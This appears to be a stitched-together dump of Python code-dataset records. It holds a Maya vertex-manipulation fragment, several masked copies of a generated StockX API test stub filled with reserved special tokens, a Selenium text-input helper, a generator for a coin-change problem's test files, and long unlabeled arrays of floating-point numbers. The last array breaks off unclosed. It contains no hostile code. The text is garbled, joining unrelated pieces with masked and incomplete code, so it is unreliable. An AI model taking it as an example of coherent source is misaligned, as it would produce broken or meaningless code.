mDagPath, mObj = mSel.getComponent(0)\n vtx = om2.MItMeshVertex(mDagPath, mObj)\n while not vtx.isDone():\n vtx_pos = vtx.position(spc)\n print 'vertex:'+str(vtx.index()), vtx_pos.y\n if vtx.index() & 1:\n vtx_pos.y += up_y\n vtx.setPosition(vtx_pos, spc)\n vtx.next()\n\n vtx.updateSurface()\n\n\ndef set_random_vertex(shapes, up_y):\n spc = om2.MSpace.kWorld\n for shape in shapes:\n mSel = om2.MSelectionList()\n mSel.add(shape)\n mDagPath, mObj = mSel.getComponent(0)\n vtx = om2.MItMeshVertex(mDagPath, mObj)\n while not vtx.isDone():\n vtx_pos = vtx.position(spc)\n print 'vertex:'+str(vtx.index()), vtx_pos.y\n vtx_pos.z += random.uniform(0, up_y)\n vtx.setPosition(vtx_pos, spc)\n vtx.next()\n\n vtx.updateSurface()\n\n\ndef create_boxes(shapes, group_name, shape_name, on_face):\n if on_face:\n face_data = get_faces(shapes)\n else:\n face_data = get_vertex(shapes)\n cmds.group(em=True, name=group_name)\n for face in face_data:\n # print(face.face_index, face.face_path, face.face_center)\n if face.face_index & 1:\n cmds.select(face.face_path, add=True)\n p_name = shape_name + str(face.face_index)\n cmds.polyCube(n=p_name) # create polyCube name by p_ + face index\n cmds.setAttr(p_name+'.scale', 0.3, 0.3, 0.3)\n if on_face:\n cmds.setAttr(\n p_name+'.translate', face.face_center[0], face.face_center[1], face.face_center[2])\n else:\n cmds.setAttr(p_name+'.translate', face.vertex.x,\n face.vertex.y, face.vertex.z)\n cmds.select(all=True)\n cmds.parent(p_name, group_name) \n # cmds.group(p_name, parent=group_name)\n cmds.select(all=True)\n\n\ndef start():\n # shapes = cmds.ls(selection=True, shapes=True, dagObjects=True)\n # set_pos_vertex(get_shapes(), 1)\n # set_random_vertex(get_shapes(), 1)\n create_boxes(get_shapes(), 'boxes', 'v_', 0)\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class TestPortfolioIdDelResponsePortfolioItemProductMedia(unittest.TestCase):
<|reserved_special_token_0|>
def setUp(self):
pass
def tearDown(self):
pass
def testPortfolioIdDelResponsePortfolioItemProductMedia(self):
"""Test PortfolioIdDelResponsePortfolioItemProductMedia"""
pass
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestPortfolioIdDelResponsePortfolioItemProductMedia(unittest.TestCase):
"""PortfolioIdDelResponsePortfolioItemProductMedia unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testPortfolioIdDelResponsePortfolioItemProductMedia(self):
"""Test PortfolioIdDelResponsePortfolioItemProductMedia"""
pass
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestPortfolioIdDelResponsePortfolioItemProductMedia(unittest.TestCase):
"""PortfolioIdDelResponsePortfolioItemProductMedia unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testPortfolioIdDelResponsePortfolioItemProductMedia(self):
"""Test PortfolioIdDelResponsePortfolioItemProductMedia"""
pass
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from __future__ import absolute_import
import unittest
import io_stockx
from io_stockx.models.portfolio_id_del_response_portfolio_item_product_media import PortfolioIdDelResponsePortfolioItemProductMedia
from io_stockx.rest import ApiException
class TestPortfolioIdDelResponsePortfolioItemProductMedia(unittest.TestCase):
"""PortfolioIdDelResponsePortfolioItemProductMedia unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testPortfolioIdDelResponsePortfolioItemProductMedia(self):
"""Test PortfolioIdDelResponsePortfolioItemProductMedia"""
pass
if __name__ == '__main__':
unittest.main()
<|reserved_special_token_1|>
# coding: utf-8
"""
StockX API
PRERELEASE API - Subject to change before release. Provides access to StockX's public services, allowing end users to query for product and order information. # noqa: E501
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import io_stockx
from io_stockx.models.portfolio_id_del_response_portfolio_item_product_media import PortfolioIdDelResponsePortfolioItemProductMedia # noqa: E501
from io_stockx.rest import ApiException
# Swagger-codegen generated stub: structure (setUp/tearDown/test method) is
# fixed by the generator and intentionally left empty until filled in.
class TestPortfolioIdDelResponsePortfolioItemProductMedia(unittest.TestCase):
    """PortfolioIdDelResponsePortfolioItemProductMedia unit test stubs"""

    def setUp(self):
        # No fixtures required for the generated stub.
        pass

    def tearDown(self):
        # Nothing to clean up.
        pass

    def testPortfolioIdDelResponsePortfolioItemProductMedia(self):
        """Test PortfolioIdDelResponsePortfolioItemProductMedia"""
        # FIXME: construct object with mandatory attributes with example values
        # model = io_stockx.models.portfolio_id_del_response_portfolio_item_product_media.PortfolioIdDelResponsePortfolioItemProductMedia()  # noqa: E501
        pass


if __name__ == '__main__':
    unittest.main()
|
flexible
|
{
"blob_id": "ae88418ccfdaa4b357a2491f6450dbcda55b1c21",
"index": 2013,
"step-1": "<mask token>\n\n\nclass TestPortfolioIdDelResponsePortfolioItemProductMedia(unittest.TestCase):\n <mask token>\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def testPortfolioIdDelResponsePortfolioItemProductMedia(self):\n \"\"\"Test PortfolioIdDelResponsePortfolioItemProductMedia\"\"\"\n pass\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestPortfolioIdDelResponsePortfolioItemProductMedia(unittest.TestCase):\n \"\"\"PortfolioIdDelResponsePortfolioItemProductMedia unit test stubs\"\"\"\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def testPortfolioIdDelResponsePortfolioItemProductMedia(self):\n \"\"\"Test PortfolioIdDelResponsePortfolioItemProductMedia\"\"\"\n pass\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestPortfolioIdDelResponsePortfolioItemProductMedia(unittest.TestCase):\n \"\"\"PortfolioIdDelResponsePortfolioItemProductMedia unit test stubs\"\"\"\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def testPortfolioIdDelResponsePortfolioItemProductMedia(self):\n \"\"\"Test PortfolioIdDelResponsePortfolioItemProductMedia\"\"\"\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "<mask token>\nfrom __future__ import absolute_import\nimport unittest\nimport io_stockx\nfrom io_stockx.models.portfolio_id_del_response_portfolio_item_product_media import PortfolioIdDelResponsePortfolioItemProductMedia\nfrom io_stockx.rest import ApiException\n\n\nclass TestPortfolioIdDelResponsePortfolioItemProductMedia(unittest.TestCase):\n \"\"\"PortfolioIdDelResponsePortfolioItemProductMedia unit test stubs\"\"\"\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def testPortfolioIdDelResponsePortfolioItemProductMedia(self):\n \"\"\"Test PortfolioIdDelResponsePortfolioItemProductMedia\"\"\"\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "# coding: utf-8\n\n\"\"\"\n StockX API\n\n PRERELEASE API - Subject to change before release. Provides access to StockX's public services, allowing end users to query for product and order information. # noqa: E501\n\n OpenAPI spec version: 1.0.0\n \n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom __future__ import absolute_import\n\nimport unittest\n\nimport io_stockx\nfrom io_stockx.models.portfolio_id_del_response_portfolio_item_product_media import PortfolioIdDelResponsePortfolioItemProductMedia # noqa: E501\nfrom io_stockx.rest import ApiException\n\n\nclass TestPortfolioIdDelResponsePortfolioItemProductMedia(unittest.TestCase):\n \"\"\"PortfolioIdDelResponsePortfolioItemProductMedia unit test stubs\"\"\"\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def testPortfolioIdDelResponsePortfolioItemProductMedia(self):\n \"\"\"Test PortfolioIdDelResponsePortfolioItemProductMedia\"\"\"\n # FIXME: construct object with mandatory attributes with example values\n # model = io_stockx.models.portfolio_id_del_response_portfolio_item_product_media.PortfolioIdDelResponsePortfolioItemProductMedia() # noqa: E501\n pass\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
# -*- coding: utf-8 -*-
from selenium.webdriver.common.keys import Keys
from titan.components import Base
class Input(Base):
    """Keyboard-input component: clears or fills a field located by XPath.

    Expects ``self.params`` to carry at least 'xpath', plus the optional
    keys documented on each method, and ``self.driver`` to be a Selenium
    WebDriver (both provided by the Base component).
    """

    def clear(self):
        """Clear the target field.

        If params['clear'] is truthy, use the native WebElement.clear()
        and return True.  Otherwise click the element and send BACK_SPACE
        params['space'] times (default 4); returns None in that case.
        NOTE(review): the two paths return different values -- confirm no
        caller depends on the truthy result before unifying them.
        """
        element = self.driver.find_element_by_xpath(self.params['xpath'])
        if self.params.get('clear', None):
            element.clear()
            return True

        element.click()
        # Manual deletion fallback when a native clear() is not wanted.
        space_num = self.params['space'] if self.params.get('space', None) else 4
        while space_num:
            space_num -= 1
            element.send_keys(Keys.BACK_SPACE)

    def text(self):
        """Type params['text'] into the field located by params['xpath']."""
        element = self.driver.find_element_by_xpath(self.params['xpath'])
        element.send_keys(self.params['text'])
|
normal
|
{
"blob_id": "7503a0c8f83ff0ce370ed7bce733b09d9a2c69c4",
"index": 817,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Input(Base):\n\n def clear(self):\n element = self.driver.find_element_by_xpath(self.params['xpath'])\n if self.params.get('clear', None):\n element.clear()\n return True\n element.click()\n space_num = self.params['space'] if self.params.get('space', None\n ) else 4\n while space_num:\n space_num -= 1\n element.send_keys(Keys.BACK_SPACE)\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Input(Base):\n\n def clear(self):\n element = self.driver.find_element_by_xpath(self.params['xpath'])\n if self.params.get('clear', None):\n element.clear()\n return True\n element.click()\n space_num = self.params['space'] if self.params.get('space', None\n ) else 4\n while space_num:\n space_num -= 1\n element.send_keys(Keys.BACK_SPACE)\n\n def text(self):\n print(self.params)\n element = self.driver.find_element_by_xpath(self.params['xpath'])\n element.send_keys(self.params['text'])\n",
"step-4": "from selenium.webdriver.common.keys import Keys\nfrom titan.components import Base\n\n\nclass Input(Base):\n\n def clear(self):\n element = self.driver.find_element_by_xpath(self.params['xpath'])\n if self.params.get('clear', None):\n element.clear()\n return True\n element.click()\n space_num = self.params['space'] if self.params.get('space', None\n ) else 4\n while space_num:\n space_num -= 1\n element.send_keys(Keys.BACK_SPACE)\n\n def text(self):\n print(self.params)\n element = self.driver.find_element_by_xpath(self.params['xpath'])\n element.send_keys(self.params['text'])\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom selenium.webdriver.common.keys import Keys\nfrom titan.components import Base\n\n\nclass Input(Base):\n\n def clear(self):\n element = self.driver.find_element_by_xpath(self.params['xpath'])\n if self.params.get('clear', None):\n element.clear()\n return True\n\n element.click()\n space_num = self.params['space']if self.params.get('space', None) else 4\n while space_num:\n space_num -= 1\n element.send_keys(Keys.BACK_SPACE)\n\n def text(self):\n print(self.params)\n element = self.driver.find_element_by_xpath(self.params['xpath'])\n element.send_keys(self.params['text'])\n\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
#!/usr/bin/python
# Test-data generator for problem "change": writes one change<N>.in file
# per entry in `cases`.  Each file lists all ordered denomination pairs
# (a, b) with b < a and a <= n, preceded by the pair count.

from random import *  # NOTE(review): unused import -- kept to preserve the original file interface

prob = "change"

# Upper bound n for each generated case file (file index = position + 1).
cases = [
    10,
    10,
    10,
    100,
    100,
    100000,
    100000,
    100000,
    100000,
    100000
]
cur = 0

# Available coin denominations.
st = [1, 2, 5, 10, 20, 50, 100, 200, 500, 1000, 2000, 5000, 10000]

for n in cases:
    cur += 1
    # Single-argument print form works identically on Python 2 and 3.
    print("make %d..." % cur)

    # Enumerate all ordered pairs (a, b) with b < a and a <= n.
    stt = []
    for a in st:
        for b in st:
            if b < a and a <= n:
                stt.append((a, b))

    # Build the output with join (linear) instead of repeated += (quadratic).
    lines = ["%d\n" % len(stt)]
    for (a, b) in stt:
        lines.append("%d %d\n" % (a, b))

    # `with open(...)` guarantees the handle is closed even on error and
    # replaces the deprecated Python 2 file() constructor.
    with open(prob + str(cur) + ".in", "w") as f:
        f.write("".join(lines))
|
normal
|
{
"blob_id": "2cef5311a9ff9497ad6611fe7b47e4f7c5b1b3c7",
"index": 7581,
"step-1": "#!/usr/bin/python\n\nfrom random import *\n\nprob = \"change\"\n\ncases = [ \n 10,\n 10,\n 10,\n 100,\n 100,\n 100000,\n 100000,\n 100000,\n 100000,\n 100000\n ]\ncur = 0\n\nst = [1,2,5,10,20,50,100,200,500,1000,2000,5000,10000]\n\nfor (n) in cases :\n cout = \"\"\n cur += 1\n print \"make %d...\" % cur\n##-----\n#TODO generate the data\n\n tot = 0\n stt = []\n for a in st :\n for b in st :\n if b < a and a <= n :\n tot = tot + 1\n stt.append( (a,b) )\n cout += \"%d\\n\" % tot\n for (a,b) in stt :\n cout += \"%d %d\\n\" % (a, b)\n\n\n##-----\n f = file( prob + str(cur) + \".in\", \"w\" )\n f.write( cout )\n f.close()\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
one=[7.236287049225701e-06, -1.445911565527231e-12, -1.7498772740084537e-13, 5.109944355076077e-11, -2.5430545472048434e-10, -1.1709514644876058e-15, 3.210132219509301e-16, 2.502027767038304e-05, -1.975229899156637e-06, -1.4769695480936238e-08, 8.945619840357268e-10, 135323228000.64511, 130464457208.5385]
two=[6.101651991514008e-06, -1.2764740103418866e-12, -1.9703439809858206e-13, 4.396430723625485e-11, -7.256876412950873e-11, -1.0739249647595844e-15, 3.658727722774004e-16, 2.9622074287767617e-05, -1.9615179204309246e-06, -1.518516920005905e-08, 8.601004856702239e-10, 194360719320.3122, 75684271432.82758]
three=[6.4442734160126695e-06, -1.2463732938819767e-12, -1.7912928652160854e-13, 3.990379556815055e-11, -7.256876412950873e-11, -1.128505986956859e-15, 3.855466000081844e-16, 2.7105518268805634e-05, -1.918022677712299e-06, -1.648586510957147e-08, 8.952907812465134e-10, 40874176708.45886, 129961018217.7445]
four=[5.591985036569838e-06, -1.5732644861037622e-12, -1.2586540738798186e-13, 5.508993685740796e-11, -2.345347836605763e-10, -2.1583737575101563e-15, 3.315525502908504e-16, 2.240369111953624e-05, -1.8808495402864136e-06, -1.5154818034574072e-08, 9.134128217572173e-10, 95538034865.65512, 192689393537.75766]
five=[5.9877501684316964e-06, -1.4725222964411265e-12, -2.0184675219747084e-13, 4.503520441436847e-11, -2.195719309752964e-10, -1.1996862422718706e-15, 3.172649531291829e-16, 2.235294071412983e-05, -1.7673862518012629e-06, -1.593810591566234e-08, 8.495479067416047e-10, 172629547544.72174, 121012464101.10771]
six = [6.525636151737385e-10, -1.5516831882387681e-12, -1.7065883936338436e-13, 4.6265959327559024e-11, -2.669670220497726e-10, -1.0739249647595844e-15, 9.085513864943156e-16, 2.5963751617497686e-05, -1.9757021060346726e-06, -1.5031696163247858e-08, 8.945619840357268e-10, 99871865434.22476, 123933224114.80229]
first1_gen= [[6.417695307686038e-06, -1.2416886913890308e-12, -1.791907685050265e-13, 3.983180616117193e-11, -7.243488055496258e-11, -1.1211433897576025e-15, 3.855466000081844e-16, 2.7255618460061466e-05, -1.917823676019374e-06, -1.6515339421288782e-08, 9.011563904603084e-10, 37866240406.859344, 251532289608.81], [5.974092884160685e-06, -1.4591405170404072e-12, -2.0184675219747084e-13, 4.3821744446480515e-11, -7.22093644433135e-11, -1.0712173220027044e-15, 3.65758224365464e-16, 2.235294071412983e-05, -1.763797302814154e-06, -1.6059311052756668e-08, 8.601004856702239e-10, 50907349656.8246, 117645129547.73723], [7.171513003462397e-06, -1.4334443716578728e-12, -1.749514610735409e-13, 5.509823004788858e-11, -2.5310572250093563e-10, -1.1729621402736547e-15, 3.321162280251396e-16, 2.4812886502853343e-05, -1.964119169077712e-06, -1.4799846596325615e-08, 8.965548334484032e-10, 85071583311.774, 128667385131.30013], [7.3000149385339486e-06, -1.4508582334938624e-12, -1.7446896418754742e-13, 5.109944355076077e-11, -2.5448794058714256e-10, -1.1658376910672744e-15, 3.1827015830354867e-16, 2.502027767038304e-05, -1.9664311146400523e-06, -1.4730561693079958e-08, 8.945619840357268e-10, 88113858040.47986, 127558862768.52084], [5.581899283069486e-06, -1.5683042319109065e-12, -1.2586540738798186e-13, 5.535493146365402e-11, -2.359264703422783e-10, -2.1583737575101563e-15, 3.2921934547988314e-16, 2.2287538734129395e-05, -1.8740196054647742e-06, -1.5117323048065992e-08, 9.114608510796109e-10, 90926368846.81926, 202187413440.1054], [7.283321725975412e-06, -1.4356567410151954e-12, -1.7340660013452496e-13, 5.090884822547887e-11, -2.5483963758954753e-10, -1.139281753854116e-15, 3.1970242364315826e-16, 2.7105518268805634e-05, -1.963160298901409e-06, -1.4681586301228543e-08, 8.916460477308206e-10, 142505061534.36484, 476063714570.38367], [5.591985036569838e-06, -1.582675728169255e-12, -1.7359285477580936e-13, 5.508993685740796e-11, -2.5320893657294154e-10, -2.1583737575101563e-15, 
3.210132219509301e-16, 2.511654073479438e-05, -1.965555797894771e-06, -1.5140087108671845e-08, 9.214909160927855e-10, 154168790181.56195, 151975095946.00134], [6.4442734160126695e-06, -1.5732644861037622e-12, -1.8036634758606428e-13, 5.508993685740796e-11, -7.27534017567909e-11, -2.1583737575101563e-15, 3.306758579127667e-16, 2.2271668826613973e-05, -1.8701423073554431e-06, -1.501078224172373e-08, 8.952907812465134e-10, 267883353895.00665, 158759045786.36343], [6.460391520361948e-06, -1.2647094709156108e-12, -1.7971415732486973e-13, 4.396430723625485e-11, -7.247266456377939e-11, -1.1373744765683215e-15, 3.658727722774004e-16, 2.7105518268805634e-05, -1.9663482803776534e-06, -1.6397993463300374e-08, 8.923803313149724e-10, 349965962553.9084, 297837273933.3269], [5.6272383047081095e-06, -1.5732644861037622e-12, -1.2571170147507106e-13, 5.534697362808701e-11, -2.3610413258218975e-10, -1.1709514644876058e-15, 3.2295817320330796e-16, 2.2314117324425535e-05, -1.8663649176622442e-06, -1.4769695480936238e-08, 9.134128217572173e-10, 393807734620.02893, 1450122303072.2456], [6.437914022666636e-06, -1.2546731037733632e-12, -1.7844406460041829e-13, 5.488975389250315e-11, -7.259445338393382e-11, -2.1597092009682793e-15, 3.3041861616205316e-16, 2.240369111953624e-05, -1.876360375320595e-06, -1.648586510957147e-08, 9.134128217572173e-10, 630890128752.3734, 431834854178.85406], [6.046575120541287e-06, -1.2764740103418866e-12, -1.746683186012092e-13, 5.109944355076077e-11, -2.520608616913497e-10, -1.0704525109919603e-15, 3.6772692838424905e-16, 2.971296945414015e-05, -1.951293357817624e-06, -1.4769695480936238e-08, 8.939102135383639e-10, 871857905030.9667, 2328286443290.7437], [6.051000675950963e-06, -1.2846825520511646e-12, -1.268060597488819e-13, 5.490952472465525e-11, -2.3244121922778247e-10, -2.1424540029363198e-15, 3.673980081076506e-16, 2.961326937497751e-05, -1.895367635724618e-06, -1.5034205062876655e-08, 9.16195585945909e-10, 1374938673042.5493, 4524615824537.332], 
[5.6149092148265474e-06, -1.4639678768975506e-12, -1.253161090730697e-13, 4.481233479664715e-11, -2.335516269047763e-10, -2.1416544930348844e-15, 3.3108330528832777e-16, 2.22837679272578e-05, -1.8681878215606722e-06, -1.528899727808779e-08, 8.573199342562181e-10, 1914602582873.603, 2013877892656.268], [6.101651991514008e-06, -1.5833077943313046e-12, -1.9703439809858206e-13, 5.500949944067544e-11, -7.256876412950873e-11, -1.0739249647595844e-15, 3.658727722774004e-16, 2.970517711660123e-05, -1.8738366196528042e-06, -1.522166132952199e-08, 9.123763139194573e-10, 3105022967535.493, 7589715261899.736], [7.169307360099383e-06, -1.475336624504327e-12, -2.0167346748799746e-13, 4.53859215469466e-11, -2.1795530264429259e-10, -1.209364174087727e-15, 3.179525403817121e-16, 2.248948490803903e-05, -1.9732992714201345e-06, -1.4769695480936238e-08, 8.472670825115021e-10, 3105580314530.341, 4622017117439.275]]
second1_gen= [[6.473615077297489e-06, -1.2416886913890308e-12, -1.7473505716030156e-13, 3.966285637236728e-11, -7.243488055496258e-11, -1.1645955168783485e-15, 3.1918479761370934e-16, 2.7255618460061466e-05, -1.912188850787629e-06, -1.6430064111592607e-08, 8.970550453733459e-10, 35685411688.23251, 231044368946.34586], [6.393923513974502e-06, -1.2418411778899226e-12, -1.7798884315456173e-13, 3.983180616117193e-11, -7.243742739542879e-11, -1.128236668058653e-15, 3.855466000081844e-16, 2.7200371659468664e-05, -1.9285560276423494e-06, -1.636514926725132e-08, 9.071692193685023e-10, 57865021002.9106, 360571654391.1672], [7.230454358781939e-06, -1.423600316370741e-12, -1.7526876652912844e-13, 5.484412599476033e-11, -7.222102668803471e-11, -1.1795054510279537e-15, 3.642469974043324e-16, 2.4721354631465055e-05, -1.7738362153245365e-06, -1.6042437181983083e-08, 8.601004856702239e-10, 60788722272.11295, 440230270157.01904], [6.435449388867622e-06, -1.2416886913890308e-12, -1.807074860305897e-13, 5.4624696474782334e-11, -7.299561923303083e-11, -1.1155657493946243e-15, 3.855466000081844e-16, 2.4639345261867096e-05, -1.92912357850029e-06, -1.4800406168095671e-08, 9.011563904603084e-10, 90541420172.20418, 503189560104.03455], [6.417695307686038e-06, -1.2339817339229541e-12, -1.7924803979756243e-13, 5.5902899343682586e-11, -7.217875877484109e-11, -1.120826019773443e-15, 3.8364837768074985e-16, 2.2074405673546407e-05, -1.904212437644655e-06, -1.509791791618086e-08, 8.960324081400173e-10, 91138056935.866, 156256693553.4698], [7.235432436183002e-06, -1.444519147741974e-12, -1.7273464723057338e-13, 5.517809418856912e-11, -2.5310572250093563e-10, -1.1658376910672744e-15, 3.3048095015500005e-16, 2.4812886502853343e-05, -1.964119169077712e-06, -1.4777953862585708e-08, 8.945619840357268e-10, 98015149423.40909, 125389712442.99564], [6.382295596647026e-06, -1.5683042319109065e-12, -1.271182130914441e-13, 3.9709881372590666e-11, -2.3411267641257417e-10, -1.1298867172210502e-15, 
3.273827033054119e-16, 2.71828464025051e-05, -1.86879521538149e-06, -1.6615697675064263e-08, 8.938783145101195e-10, 108132988244.55444, 600937075323.7117], [7.3000149385339486e-06, -1.4649443926376347e-12, -1.740251215699652e-13, 5.5040821609381877e-11, -2.5448794058714256e-10, -1.1729621402736547e-15, 3.321162280251396e-16, 2.492985953688089e-05, -1.95260325957056e-06, -1.4879723555310096e-08, 8.886352647229086e-10, 118040637271.1665, 119637343045.177], [5.595995170722691e-06, -1.5775800984465949e-12, -1.2531378473105398e-13, 5.5737478708430025e-11, -2.359264703422783e-10, -2.141274549861917e-15, 3.2670998922499434e-16, 2.2375793269713536e-05, -1.8912926681237391e-06, -1.5244852134327217e-08, 9.114608510796109e-10, 193706809398.06177, 145429438824.56485], [6.417695307686038e-06, -1.2390179448049186e-12, -2.0184675219747084e-13, 3.996761820973954e-11, -7.30077645678233e-11, -1.0733818300903034e-15, 3.6521589033170274e-16, 2.7380751148035565e-05, -1.901967051200766e-06, -1.6531476837456585e-08, 8.659462633971021e-10, 291714681643.4888, 219358626907.00577], [7.269087955666727e-06, -1.4398732474157131e-12, -1.745771866624504e-13, 5.5370858680922966e-11, -2.5212090845365535e-10, -1.1547640084684547e-15, 3.1826570991307717e-16, 2.4799848604697875e-05, -1.9802449310363633e-06, -1.4932011828861567e-08, 8.916225586049855e-10, 291814703950.912, 265497905413.09335], [5.9575073045674184e-06, -1.4591405170404072e-12, -1.7515686156504634e-13, 5.071091939607585e-11, -7.251972289899038e-11, -1.172163868062928e-15, 3.2003450301868095e-16, 2.236559796692659e-05, -1.964000257622103e-06, -1.461000086726312e-08, 8.924031273079037e-10, 441351014961.37744, 513124822279.29816], [7.118156558728498e-06, -1.4213484509322684e-12, -1.7594919642528414e-13, 5.502275447498347e-11, -2.359264703422783e-10, -2.146866081339977e-15, 3.3020925008057705e-16, 2.48800717576552e-05, -1.8740196054647742e-06, -1.4681760148497176e-08, 9.194043116452982e-10, 480601682287.2741, 2166349399584.3464], 
[6.435379358296727e-06, -1.449279705541305e-12, -1.791907685050265e-13, 4.013727926643595e-11, -2.561628978573389e-10, -1.1658376910672744e-15, 3.1916771926698506e-16, 2.706170262409588e-05, -1.9747493962051268e-06, -1.6529378614728517e-08, 8.945619840357268e-10, 480690251628.6576, 455217335045.56067], [7.273965294010602e-06, -1.4508582334938624e-12, -1.2640181562203036e-13, 5.1256890020829106e-11, -2.347526011960417e-10, -1.1573810914157072e-15, 3.313802025100971e-16, 2.5248996663846427e-05, -1.8890715225154116e-06, -1.4830513494585048e-08, 9.024560997678787e-10, 513022508534.7746, 1741282758378.8208], [7.171513003462397e-06, -1.4334443716578728e-12, -1.258745292341622e-13, 5.562080442549079e-11, -2.5310572250093563e-10, -2.177369178159867e-15, 3.269368594462498e-16, 2.5052523082312023e-05, -1.9593459141604013e-06, -1.4665768665138152e-08, 8.920318373308913e-10, 559251400205.1976, 313686240874.89294]]
third1_gen= [[6.428534934734018e-06, -1.2348251959432863e-12, -1.767418187059626e-13, 3.954772029523348e-11, -7.292041892016764e-11, -1.1216042005993232e-15, 3.8462974452187554e-16, 2.732021800880368e-05, -1.912188850787629e-06, -1.6465861899672315e-08, 8.953663972360121e-10, 35914970214.05617, 208658422545.5101], [6.449609175276781e-06, -1.2355212093166627e-12, -1.7892996139776768e-13, 3.978108705811362e-11, -7.260470610345522e-11, -1.128236668058653e-15, 3.8262320992212617e-16, 2.699492740612888e-05, -1.9285560276423494e-06, -1.6459368248390354e-08, 9.071692193685023e-10, 37667755025.66565, 260591174431.75333], [6.393923513974502e-06, -1.2329510175057565e-12, -1.7878217157136278e-13, 4.009121098742944e-11, -7.243742739542879e-11, -1.119215448440791e-15, 3.855466000081844e-16, 2.7170577516281446e-05, -1.946180426984478e-06, -1.6356719885598995e-08, 9.071692193685023e-10, 41822657912.61174, 187148082730.9518], [6.393923513974502e-06, -1.2418411778899226e-12, -1.7764720872488035e-13, 5.5839617178535e-11, -7.217875877484109e-11, -1.1285205693786809e-15, 3.8241419562917457e-16, 2.727322263242888e-05, -1.9285560276423494e-06, -1.6299569164241514e-08, 8.954758973117168e-10, 45658359101.85514, 143455126000.2526], [6.412748625088242e-06, -1.2418411778899226e-12, -1.7788474362949836e-13, 3.98996561577576e-11, -7.290920324596793e-11, -1.1258830930124426e-15, 3.8322709394594156e-16, 2.6978084672522227e-05, -1.9285560276423494e-06, -1.6212095851483947e-08, 9.06465374180439e-10, 61888825971.955795, 378668457219.4866], [7.2950079161541e-06, -1.423600316370741e-12, -1.8067111524974517e-13, 5.467528933636526e-11, -7.269174548770519e-11, -1.1131382577055909e-15, 3.642469974043324e-16, 2.442302310111588e-05, -1.9365154780516644e-06, -1.4736235919210341e-08, 9.02573445716291e-10, 72168008768.07632, 429565720321.34186], [7.277641363649251e-06, -1.4186237292635021e-12, -1.7672076654522444e-13, 5.4875348972838477e-11, -7.250728822785179e-11, -1.1805107762756462e-15, 
3.880180132520679e-16, 2.7230117388865188e-05, -1.79140018540739e-06, -1.6042437181983083e-08, 8.524740779894739e-10, 144497176198.74966, 733034177617.006], [6.435449388867622e-06, -1.2375432988348708e-12, -1.8114977137612309e-13, 3.9353291584632385e-11, -7.306938943468394e-11, -1.1645955168783485e-15, 3.887993677152085e-16, 2.4432920122355823e-05, -1.927081007099796e-06, -1.644170413651962e-08, 9.09149545755435e-10, 151124978488.96066, 169172823395.74277], [7.278147471012389e-06, -1.4279386093057266e-12, -1.7683419692117291e-13, 5.493758019518918e-11, -7.289146026177328e-11, -1.1733747472097884e-15, 3.675691109659462e-16, 2.4721354631465055e-05, -1.7638896999117907e-06, -1.588988736168235e-08, 8.632841256471107e-10, 202474467398.45615, 922092113586.5779], [7.177079530800026e-06, -1.234976832476029e-12, -1.7526876652912844e-13, 5.534254133122458e-11, -7.205830797649949e-11, -1.120826019773443e-15, 3.8364837768074985e-16, 2.2258192147086412e-05, -1.7878127478583311e-06, -1.620023857736605e-08, 8.601004856702239e-10, 213869103072.6637, 175609972725.89545], [6.350923506939188e-06, -1.2525603780194753e-12, -1.7993410193080307e-13, 5.465765498048408e-11, -7.243742739542879e-11, -1.1188147125437704e-15, 3.855466000081844e-16, 2.47790541156232e-05, -1.9163436765125797e-06, -1.4800406168095671e-08, 9.043461740243768e-10, 224990894591.97565, 940216435276.2135], [6.375685299492019e-06, -1.2470011129066444e-12, -1.7556981763399573e-13, 5.482994274294271e-11, -7.247391358991481e-11, -1.1737410455893592e-15, 3.8256427214483946e-16, 2.4747394888572957e-05, -1.921085601798487e-06, -1.655011267092608e-08, 9.011563904603084e-10, 242139334921.33466, 239644754200.97003], [6.474178960026375e-06, -1.436844524248817e-12, -1.766513283684079e-13, 3.940038642964773e-11, -7.181977887130175e-11, -1.1548751736666541e-15, 3.1745148598988346e-16, 2.707077658308786e-05, -1.92536072773705e-06, -1.6138736645669917e-08, 8.669699125562364e-10, 435950975348.6226, 363915964843.3034], 
